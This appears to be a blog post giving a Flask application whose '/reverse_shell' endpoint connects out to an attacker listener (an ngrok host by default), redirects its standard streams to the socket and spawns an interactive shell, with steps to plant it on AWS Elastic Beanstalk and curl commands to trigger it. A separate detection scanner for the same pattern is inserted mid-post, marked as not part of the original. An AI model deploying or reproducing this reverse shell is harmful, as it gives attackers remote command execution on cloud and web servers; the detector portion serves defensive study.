A Simple Reverse Shell in Flask

This post contains a reverse shell that can be used to execute system commands from a Flask application.

Execute Reverse Shell

Create a file named requirements.txt

Flask

Create a file named application.py

from flask import Flask, request
import socket
import subprocess
import os

application = Flask(__name__)

@application.route('/reverse_shell', methods=['GET'])
def reverse_shell():
    try:
        # Get connection details from the GET request (defaults point at the listener)
        host = request.args.get('host', '0.tcp.ap.ngrok.io')
        port = int(request.args.get('port', '18996'))

        # Create socket and connect out to the listener
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.connect((host, port))

        # Redirect stdin, stdout, stderr of this process to the socket
        os.dup2(s.fileno(), 0)
        os.dup2(s.fileno(), 1)
        os.dup2(s.fileno(), 2)

        # Run an interactive shell; this blocks until the shell exits
        subprocess.call(["/bin/sh", "-i"])

        return "Shell executed", 200
    except Exception as e:
        return str(e), 500

if __name__ == "__main__":
    # Use the following if you upload to Elastic Beanstalk or another such container
    application.run(debug=True)
    # Use the following for local testing
    # application.run(host='0.0.0.0', port=5000)
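The handler above is a three-step pattern (outbound connect, dup2 of the socket onto file descriptors 0, 1 and 2, then an interactive shell) that is easy to recognise statically. The following scanner is an added example, not code from the original post: it parses Python source with the standard `ast` module and reports which of the three indicators it finds. `SAMPLE_SOURCE` is a constructed input reproducing that pattern; the indicator names and the `SHELLS`/`SPAWNERS` tables are assumptions of this example.

```python
import ast

# Constructed sample: the same three steps the application above performs
# (outbound connect, dup2 onto fds 0/1/2, interactive shell).
SAMPLE_SOURCE = '''
import os, socket, subprocess
def handler(host, port):
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect((host, port))
    os.dup2(s.fileno(), 0)
    os.dup2(s.fileno(), 1)
    os.dup2(s.fileno(), 2)
    subprocess.call(["/bin/sh", "-i"])
'''

# Interpreter names that, passed to a process-spawning call, indicate a shell (assumed list).
SHELLS = {"/bin/sh", "/bin/bash", "/bin/dash", "sh", "bash", "cmd.exe", "powershell"}
SPAWNERS = ("subprocess.", "os.system", "os.exec", "os.popen", "os.spawn", "pty.spawn")

def scan_source(src):
    """Return the set of indicators found: socket_connect, dup2_stdio, spawn_shell."""
    found, dup2_fds = set(), set()
    for node in ast.walk(ast.parse(src)):
        if not isinstance(node, ast.Call):
            continue
        name = ast.unparse(node.func)          # e.g. "s.connect", "os.dup2"
        if name.endswith(".connect"):
            found.add("socket_connect")
        elif name == "os.dup2" and len(node.args) == 2:
            fd = node.args[1]
            if isinstance(fd, ast.Constant) and fd.value in (0, 1, 2):
                dup2_fds.add(fd.value)
        elif name.startswith(SPAWNERS):
            for arg in node.args:              # argv list/tuple or a bare string
                elems = arg.elts if isinstance(arg, (ast.List, ast.Tuple)) else [arg]
                if any(isinstance(e, ast.Constant) and e.value in SHELLS for e in elems):
                    found.add("spawn_shell")
    if dup2_fds == {0, 1, 2}:                  # all three standard streams redirected
        found.add("dup2_stdio")
    return found

def is_reverse_shell(src):
    """True only when all three indicators appear together in the file."""
    return {"socket_connect", "dup2_stdio", "spawn_shell"} <= scan_source(src)

if __name__ == "__main__":
    print(sorted(scan_source(SAMPLE_SOURCE)), is_reverse_shell(SAMPLE_SOURCE))
```

Requires Python 3.9 or newer for `ast.unparse`; a string command such as `Popen("bash -i", shell=True)` is outside what this heuristic matches.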

Execute From Elastic Beanstalk

Modify the host and port in the reverse shell application.py to get a shell back on your listener. If you publish to Elastic Beanstalk, you will automatically get a shell, provided the host and port of your listener are configured properly.

Otherwise, the reverse shell can be triggered by sending the following GET request with your desired listener host and port:

curl "http://<your-elastic-beanstalk-URL>/reverse_shell?host=0.tcp.ap.ngrok.io&port=18996"

More Info:

https://cloud.hacktricks.wiki/en/pentesting-cloud/aws-security/aws-privilege-escalation/aws-elastic-beanstalk-privesc.html#elasticbeanstalkrebuildenvironment-s3-write-permissions–many-others

https://docs.aws.amazon.com/elasticbeanstalk/latest/dg/python-quickstart.html

From Local Setup for Testing

Change the last lines as below to run on the local server on port 5000:

if __name__ == "__main__":
    # Use the following if you upload to Elastic Beanstalk or another such container
    # application.run(debug=True)
    # Use the following for local testing
    application.run(host='0.0.0.0', port=5000)

Then run the following command from the folder containing application.py and requirements.txt to start the Flask server with the reverse shell:

# export FLASK_APP=application.py && flask run --port 5000
 * Serving Flask app 'application.py'
 * Debug mode: off
WARNING: This is a development server. Do not use it in a production deployment. Use a production WSGI server instead.
 * Running on http://127.0.0.1:5000
Press CTRL+C to quit

Then start your listener and request the following URL, adjusting the host and port to match your listener:

curl "http://127.0.0.1:5000/reverse_shell?host=127.0.0.1&port=4444"


Tags

AWS, Flask, Reverse Shell, Web Application Security, Web Shell
